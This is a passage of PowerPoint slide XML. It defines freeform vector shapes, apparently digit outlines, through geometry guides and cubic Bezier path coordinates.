                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="295"/>
                    <a:pt x="26" y="264"/>
                    <a:pt x="26" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="192"/>
                    <a:pt x="57" y="159"/>
                    <a:pt x="108" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="159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5" name="Freeform 1181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{800AE27F-9CC3-4088-8782-144E437E601E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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6107112" y="1558925"/>
              <a:ext cx="80963" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 226 h 316"/>
                <a:gd name="T2" fmla="*/ 151 w 214"/>
                <a:gd name="T3" fmla="*/ 145 h 316"/>
                <a:gd name="T4" fmla="*/ 199 w 214"/>
                <a:gd name="T5" fmla="*/ 68 h 316"/>
                <a:gd name="T6" fmla="*/ 108 w 214"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 15 w 214"/>
                <a:gd name="T9" fmla="*/ 55 h 316"/>
                <a:gd name="T10" fmla="*/ 33 w 214"/>
                <a:gd name="T11" fmla="*/ 75 h 316"/>
                <a:gd name="T12" fmla="*/ 50 w 214"/>
                <a:gd name="T13" fmla="*/ 56 h 316"/>
                <a:gd name="T14" fmla="*/ 44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1 w 214"/>
                <a:gd name="T21" fmla="*/ 117 h 316"/>
                <a:gd name="T22" fmla="*/ 100 w 214"/>
                <a:gd name="T23" fmla="*/ 134 h 316"/>
                <a:gd name="T24" fmla="*/ 67 w 214"/>
                <a:gd name="T25" fmla="*/ 146 h 316"/>
                <a:gd name="T26" fmla="*/ 83 w 214"/>
                <a:gd name="T27" fmla="*/ 157 h 316"/>
                <a:gd name="T28" fmla="*/ 107 w 214"/>
                <a:gd name="T29" fmla="*/ 157 h 316"/>
                <a:gd name="T30" fmla="*/ 189 w 214"/>
                <a:gd name="T31" fmla="*/ 226 h 316"/>
                <a:gd name="T32" fmla="*/ 108 w 214"/>
                <a:gd name="T33" fmla="*/ 295 h 316"/>
                <a:gd name="T34" fmla="*/ 28 w 214"/>
                <a:gd name="T35" fmla="*/ 259 h 316"/>
                <a:gd name="T36" fmla="*/ 35 w 214"/>
                <a:gd name="T37" fmla="*/ 244 h 316"/>
                <a:gd name="T38" fmla="*/ 18 w 214"/>
                <a:gd name="T39" fmla="*/ 226 h 316"/>
                <a:gd name="T40" fmla="*/ 0 w 214"/>
                <a:gd name="T41" fmla="*/ 246 h 316"/>
                <a:gd name="T42" fmla="*/ 108 w 214"/>
                <a:gd name="T43" fmla="*/ 316 h 316"/>
                <a:gd name="T44" fmla="*/ 214 w 214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91"/>
                    <a:pt x="191" y="163"/>
                    <a:pt x="151" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="122"/>
                    <a:pt x="199" y="94"/>
                    <a:pt x="199" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="32"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="22"/>
                    <a:pt x="15" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="69"/>
                    <a:pt x="25" y="75"/>
                    <a:pt x="33" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="75"/>
                    <a:pt x="50" y="68"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="51"/>
                    <a:pt x="48" y="47"/>
                    <a:pt x="44" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="22"/>
                    <a:pt x="103" y="21"/>
                    <a:pt x="108" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="21"/>
                    <a:pt x="174" y="43"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="105"/>
                    <a:pt x="151" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="132"/>
                    <a:pt x="120" y="133"/>
                    <a:pt x="100" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="136"/>
                    <a:pt x="67" y="136"/>
                    <a:pt x="67" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="157"/>
                    <a:pt x="77" y="157"/>
                    <a:pt x="83" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="157"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="157"/>
                    <a:pt x="189" y="194"/>
                    <a:pt x="189" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="260"/>
                    <a:pt x="159" y="295"/>
                    <a:pt x="108" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="295"/>
                    <a:pt x="44" y="288"/>
                    <a:pt x="28" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="35" y="252"/>
                    <a:pt x="35" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="234"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="18" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="226"/>
                    <a:pt x="0" y="233"/>
                    <a:pt x="0" y="246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2"/>
                    <a:pt x="214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6" name="Freeform 1182">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98DB0901-094D-414D-B3F7-22C115C6D0C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId178"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6207125" y="1558925"/>
              <a:ext cx="80963" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 209 w 209"/>
                <a:gd name="T1" fmla="*/ 159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9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9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="66"/>
                    <a:pt x="160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0" y="316"/>
                    <a:pt x="209" y="249"/>
                    <a:pt x="209" y="159"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="183" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="233"/>
                    <a:pt x="147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7" name="Freeform 1183">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7603F4CF-CC92-44AB-9DF8-3AD31A68DBE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId179"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6308725" y="1558925"/>
              <a:ext cx="77788" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 206 w 206"/>
                <a:gd name="T1" fmla="*/ 155 h 316"/>
                <a:gd name="T2" fmla="*/ 105 w 206"/>
                <a:gd name="T3" fmla="*/ 0 h 316"/>
                <a:gd name="T4" fmla="*/ 0 w 206"/>
                <a:gd name="T5" fmla="*/ 100 h 316"/>
                <a:gd name="T6" fmla="*/ 98 w 206"/>
                <a:gd name="T7" fmla="*/ 200 h 316"/>
                <a:gd name="T8" fmla="*/ 180 w 206"/>
                <a:gd name="T9" fmla="*/ 162 h 316"/>
                <a:gd name="T10" fmla="*/ 79 w 206"/>
                <a:gd name="T11" fmla="*/ 295 h 316"/>
                <a:gd name="T12" fmla="*/ 38 w 206"/>
                <a:gd name="T13" fmla="*/ 282 h 316"/>
                <a:gd name="T14" fmla="*/ 45 w 206"/>
                <a:gd name="T15" fmla="*/ 267 h 316"/>
                <a:gd name="T16" fmla="*/ 27 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 316"/>
                <a:gd name="T18" fmla="*/ 9 w 206"/>
                <a:gd name="T19" fmla="*/ 268 h 316"/>
                <a:gd name="T20" fmla="*/ 79 w 206"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 206 w 206"/>
                <a:gd name="T23" fmla="*/ 155 h 316"/>
                <a:gd name="T24" fmla="*/ 176 w 206"/>
                <a:gd name="T25" fmla="*/ 115 h 316"/>
                <a:gd name="T26" fmla="*/ 100 w 206"/>
                <a:gd name="T27" fmla="*/ 178 h 316"/>
                <a:gd name="T28" fmla="*/ 26 w 206"/>
                <a:gd name="T29" fmla="*/ 100 h 316"/>
                <a:gd name="T30" fmla="*/ 105 w 206"/>
                <a:gd name="T31" fmla="*/ 21 h 316"/>
                <a:gd name="T32" fmla="*/ 154 w 206"/>
                <a:gd name="T33" fmla="*/ 45 h 316"/>
                <a:gd name="T34" fmla="*/ 174 w 206"/>
                <a:gd name="T35" fmla="*/ 96 h 316"/>
                <a:gd name="T36" fmla="*/ 176 w 206"/>
                <a:gd name="T37" fmla="*/ 1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316">
                  <a:moveTo>
                    <a:pt x="206" y="155"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="35"/>
                    <a:pt x="152" y="0"/>
                    <a:pt x="105" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="156"/>
                    <a:pt x="44" y="200"/>
                    <a:pt x="98" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="200"/>
                    <a:pt x="149" y="191"/>
                    <a:pt x="180" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="242"/>
                    <a:pt x="131" y="295"/>
                    <a:pt x="79" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="295"/>
                    <a:pt x="54" y="294"/>
                    <a:pt x="38" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="276"/>
                    <a:pt x="45" y="274"/>
                    <a:pt x="45" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="257"/>
                    <a:pt x="38" y="249"/>
                    <a:pt x="27" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="249"/>
                    <a:pt x="9" y="256"/>
                    <a:pt x="9" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="284"/>
                    <a:pt x="18" y="316"/>
                    <a:pt x="79" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="316"/>
                    <a:pt x="206" y="253"/>
                    <a:pt x="206" y="155"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="176" y="115"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="146"/>
                    <a:pt x="146" y="178"/>
                    <a:pt x="100" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="178"/>
                    <a:pt x="26" y="141"/>
                    <a:pt x="26" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="52"/>
                    <a:pt x="65" y="21"/>
                    <a:pt x="105" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="21"/>
                    <a:pt x="145" y="34"/>
                    <a:pt x="154" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="64"/>
                    <a:pt x="174" y="92"/>
                    <a:pt x="174" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="96"/>
                    <a:pt x="176" y="107"/>
                    <a:pt x="176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8" name="Freeform 1184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C7BEEFE-7C3F-4D1C-84F1-0DE0FDE7D774}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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437312" y="1658938"/>
              <a:ext cx="20638" cy="20638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9" name="Freeform 1185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8CC8E5-7AE1-4780-AE80-862F7013F19C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6500812" y="1560513"/>
              <a:ext cx="88900" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 234 w 234"/>
                <a:gd name="T1" fmla="*/ 198 h 308"/>
                <a:gd name="T2" fmla="*/ 139 w 234"/>
                <a:gd name="T3" fmla="*/ 90 h 308"/>
                <a:gd name="T4" fmla="*/ 68 w 234"/>
                <a:gd name="T5" fmla="*/ 122 h 308"/>
                <a:gd name="T6" fmla="*/ 68 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 308"/>
                <a:gd name="T8" fmla="*/ 53 w 234"/>
                <a:gd name="T9" fmla="*/ 0 h 308"/>
                <a:gd name="T10" fmla="*/ 16 w 234"/>
                <a:gd name="T11" fmla="*/ 0 h 308"/>
                <a:gd name="T12" fmla="*/ 0 w 234"/>
                <a:gd name="T13" fmla="*/ 11 h 308"/>
                <a:gd name="T14" fmla="*/ 15 w 234"/>
                <a:gd name="T15" fmla="*/ 21 h 308"/>
                <a:gd name="T16" fmla="*/ 43 w 234"/>
                <a:gd name="T17" fmla="*/ 21 h 308"/>
                <a:gd name="T18" fmla="*/ 43 w 234"/>
                <a:gd name="T19" fmla="*/ 289 h 308"/>
                <a:gd name="T20" fmla="*/ 56 w 234"/>
                <a:gd name="T21" fmla="*/ 305 h 308"/>
                <a:gd name="T22" fmla="*/ 68 w 234"/>
                <a:gd name="T23" fmla="*/ 274 h 308"/>
                <a:gd name="T24" fmla="*/ 134 w 234"/>
                <a:gd name="T25" fmla="*/ 308 h 308"/>
                <a:gd name="T26" fmla="*/ 234 w 234"/>
                <a:gd name="T27" fmla="*/ 198 h 308"/>
                <a:gd name="T28" fmla="*/ 210 w 234"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 132 w 234"/>
                <a:gd name="T31" fmla="*/ 287 h 308"/>
                <a:gd name="T32" fmla="*/ 68 w 234"/>
                <a:gd name="T33" fmla="*/ 211 h 308"/>
                <a:gd name="T34" fmla="*/ 68 w 234"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 136 w 234"/>
                <a:gd name="T37" fmla="*/ 111 h 308"/>
                <a:gd name="T38" fmla="*/ 210 w 234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308">
                  <a:moveTo>
                    <a:pt x="234" y="198"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="138"/>
                    <a:pt x="191" y="90"/>
                    <a:pt x="139" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="90"/>
                    <a:pt x="94" y="99"/>
                    <a:pt x="68" y="122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3" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="296"/>
                    <a:pt x="43" y="305"/>
                    <a:pt x="56" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="305"/>
                    <a:pt x="68" y="296"/>
                    <a:pt x="68" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="303"/>
                    <a:pt x="118" y="308"/>
                    <a:pt x="134" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="308"/>
                    <a:pt x="234" y="261"/>
                    <a:pt x="234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2" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="287"/>
                    <a:pt x="68" y="238"/>
                    <a:pt x="68" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68" y="173"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="141"/>
                    <a:pt x="101" y="111"/>
                    <a:pt x="136" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="111"/>
                    <a:pt x="210" y="151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0" name="Freeform 1186">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A6DAAC8-3437-44EA-9442-D4B5C10D7DB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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607175" y="1560513"/>
              <a:ext cx="73025" cy="119063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1" name="Freeform 1187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9EE6E0-6FEA-4A5B-9CB5-36343C49A3ED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707187" y="1560513"/>
              <a:ext cx="73025" cy="119063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3 w 194"/>
                <a:gd name="T5" fmla="*/ 63 h 308"/>
                <a:gd name="T6" fmla="*/ 73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3 w 194"/>
                <a:gd name="T15" fmla="*/ 117 h 308"/>
                <a:gd name="T16" fmla="*/ 73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2" name="Freeform 1188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4BD8CCD-3C32-46B3-A032-EA78FEA01BA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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807200" y="1560513"/>
              <a:ext cx="73025" cy="119063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3" name="Freeform 1189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A9D2977-6665-40E6-92DC-5C3738F1472B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907212" y="1560513"/>
              <a:ext cx="74613" cy="119063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3 w 194"/>
                <a:gd name="T5" fmla="*/ 63 h 308"/>
                <a:gd name="T6" fmla="*/ 73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3 w 194"/>
                <a:gd name="T15" fmla="*/ 117 h 308"/>
                <a:gd name="T16" fmla="*/ 73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4" name="Freeform 1190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91130639-4371-4DD7-9D07-C76228094A83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7007225" y="1558925"/>
              <a:ext cx="82550" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 226 h 316"/>
                <a:gd name="T2" fmla="*/ 150 w 214"/>
                <a:gd name="T3" fmla="*/ 145 h 316"/>
                <a:gd name="T4" fmla="*/ 199 w 214"/>
                <a:gd name="T5" fmla="*/ 68 h 316"/>
                <a:gd name="T6" fmla="*/ 107 w 214"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 15 w 214"/>
                <a:gd name="T9" fmla="*/ 55 h 316"/>
                <a:gd name="T10" fmla="*/ 33 w 214"/>
                <a:gd name="T11" fmla="*/ 75 h 316"/>
                <a:gd name="T12" fmla="*/ 50 w 214"/>
                <a:gd name="T13" fmla="*/ 56 h 316"/>
                <a:gd name="T14" fmla="*/ 43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0 w 214"/>
                <a:gd name="T21" fmla="*/ 117 h 316"/>
                <a:gd name="T22" fmla="*/ 99 w 214"/>
                <a:gd name="T23" fmla="*/ 134 h 316"/>
                <a:gd name="T24" fmla="*/ 67 w 214"/>
                <a:gd name="T25" fmla="*/ 146 h 316"/>
                <a:gd name="T26" fmla="*/ 82 w 214"/>
                <a:gd name="T27" fmla="*/ 157 h 316"/>
                <a:gd name="T28" fmla="*/ 106 w 214"/>
                <a:gd name="T29" fmla="*/ 157 h 316"/>
                <a:gd name="T30" fmla="*/ 189 w 214"/>
                <a:gd name="T31" fmla="*/ 226 h 316"/>
                <a:gd name="T32" fmla="*/ 108 w 214"/>
                <a:gd name="T33" fmla="*/ 295 h 316"/>
                <a:gd name="T34" fmla="*/ 28 w 214"/>
                <a:gd name="T35" fmla="*/ 259 h 316"/>
                <a:gd name="T36" fmla="*/ 35 w 214"/>
                <a:gd name="T37" fmla="*/ 244 h 316"/>
                <a:gd name="T38" fmla="*/ 18 w 214"/>
                <a:gd name="T39" fmla="*/ 226 h 316"/>
                <a:gd name="T40" fmla="*/ 0 w 214"/>
                <a:gd name="T41" fmla="*/ 246 h 316"/>
                <a:gd name="T42" fmla="*/ 108 w 214"/>
                <a:gd name="T43" fmla="*/ 316 h 316"/>
                <a:gd name="T44" fmla="*/ 214 w 214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91"/>
                    <a:pt x="191" y="163"/>
                    <a:pt x="150" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="122"/>
                    <a:pt x="199" y="94"/>
                    <a:pt x="199" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="32"/>
                    <a:pt x="163" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="15" y="22"/>
                    <a:pt x="15" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="69"/>
                    <a:pt x="25" y="75"/>
                    <a:pt x="33" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="75"/>
                    <a:pt x="50" y="68"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="51"/>
                    <a:pt x="48" y="47"/>
                    <a:pt x="43" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="22"/>
                    <a:pt x="103" y="21"/>
                    <a:pt x="108" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="21"/>
                    <a:pt x="174" y="43"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="105"/>
                    <a:pt x="150" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="132"/>
                    <a:pt x="119" y="133"/>
                    <a:pt x="99" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="136"/>
                    <a:pt x="67" y="136"/>
                    <a:pt x="67" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="157"/>
                    <a:pt x="76" y="157"/>
                    <a:pt x="82" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="157"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="157"/>
                    <a:pt x="189" y="194"/>
                    <a:pt x="189" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="260"/>
                    <a:pt x="158" y="295"/>
                    <a:pt x="108" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="295"/>
                    <a:pt x="44" y="288"/>
                    <a:pt x="28" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="35" y="252"/>
                    <a:pt x="35" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="234"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="18" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="226"/>
                    <a:pt x="0" y="233"/>
                    <a:pt x="0" y="246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2"/>
                    <a:pt x="214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5" name="Freeform 1191">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09CE8521-4D00-4B6E-B983-E2C77BF0220D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7107237" y="1558925"/>
              <a:ext cx="82550" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 215"/>
                <a:gd name="T1" fmla="*/ 226 h 316"/>
                <a:gd name="T2" fmla="*/ 151 w 215"/>
                <a:gd name="T3" fmla="*/ 145 h 316"/>
                <a:gd name="T4" fmla="*/ 200 w 215"/>
                <a:gd name="T5" fmla="*/ 68 h 316"/>
                <a:gd name="T6" fmla="*/ 108 w 215"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 15 w 215"/>
                <a:gd name="T9" fmla="*/ 55 h 316"/>
                <a:gd name="T10" fmla="*/ 33 w 215"/>
                <a:gd name="T11" fmla="*/ 75 h 316"/>
                <a:gd name="T12" fmla="*/ 51 w 215"/>
                <a:gd name="T13" fmla="*/ 56 h 316"/>
                <a:gd name="T14" fmla="*/ 44 w 215"/>
                <a:gd name="T15" fmla="*/ 42 h 316"/>
                <a:gd name="T16" fmla="*/ 109 w 215"/>
                <a:gd name="T17" fmla="*/ 21 h 316"/>
                <a:gd name="T18" fmla="*/ 174 w 215"/>
                <a:gd name="T19" fmla="*/ 68 h 316"/>
                <a:gd name="T20" fmla="*/ 151 w 215"/>
                <a:gd name="T21" fmla="*/ 117 h 316"/>
                <a:gd name="T22" fmla="*/ 100 w 215"/>
                <a:gd name="T23" fmla="*/ 134 h 316"/>
                <a:gd name="T24" fmla="*/ 68 w 215"/>
                <a:gd name="T25" fmla="*/ 146 h 316"/>
                <a:gd name="T26" fmla="*/ 83 w 215"/>
                <a:gd name="T27" fmla="*/ 157 h 316"/>
                <a:gd name="T28" fmla="*/ 107 w 215"/>
                <a:gd name="T29" fmla="*/ 157 h 316"/>
                <a:gd name="T30" fmla="*/ 189 w 215"/>
                <a:gd name="T31" fmla="*/ 226 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 215"/>
                <a:gd name="T33" fmla="*/ 295 h 316"/>
                <a:gd name="T34" fmla="*/ 28 w 215"/>
                <a:gd name="T35" fmla="*/ 259 h 316"/>
                <a:gd name="T36" fmla="*/ 36 w 215"/>
                <a:gd name="T37" fmla="*/ 244 h 316"/>
                <a:gd name="T38" fmla="*/ 18 w 215"/>
                <a:gd name="T39" fmla="*/ 226 h 316"/>
                <a:gd name="T40" fmla="*/ 0 w 215"/>
                <a:gd name="T41" fmla="*/ 246 h 316"/>
                <a:gd name="T42" fmla="*/ 109 w 215"/>
                <a:gd name="T43" fmla="*/ 316 h 316"/>
                <a:gd name="T44" fmla="*/ 215 w 215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316">
                  <a:moveTo>
                    <a:pt x="215" y="226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="191"/>
                    <a:pt x="192" y="163"/>
                    <a:pt x="151" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="122"/>
                    <a:pt x="200" y="94"/>
                    <a:pt x="200" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="32"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="22"/>
                    <a:pt x="15" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="69"/>
                    <a:pt x="25" y="75"/>
                    <a:pt x="33" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="75"/>
                    <a:pt x="51" y="68"/>
                    <a:pt x="51" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="51"/>
                    <a:pt x="49" y="47"/>
                    <a:pt x="44" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="22"/>
                    <a:pt x="104" y="21"/>
                    <a:pt x="109" y="21"/>
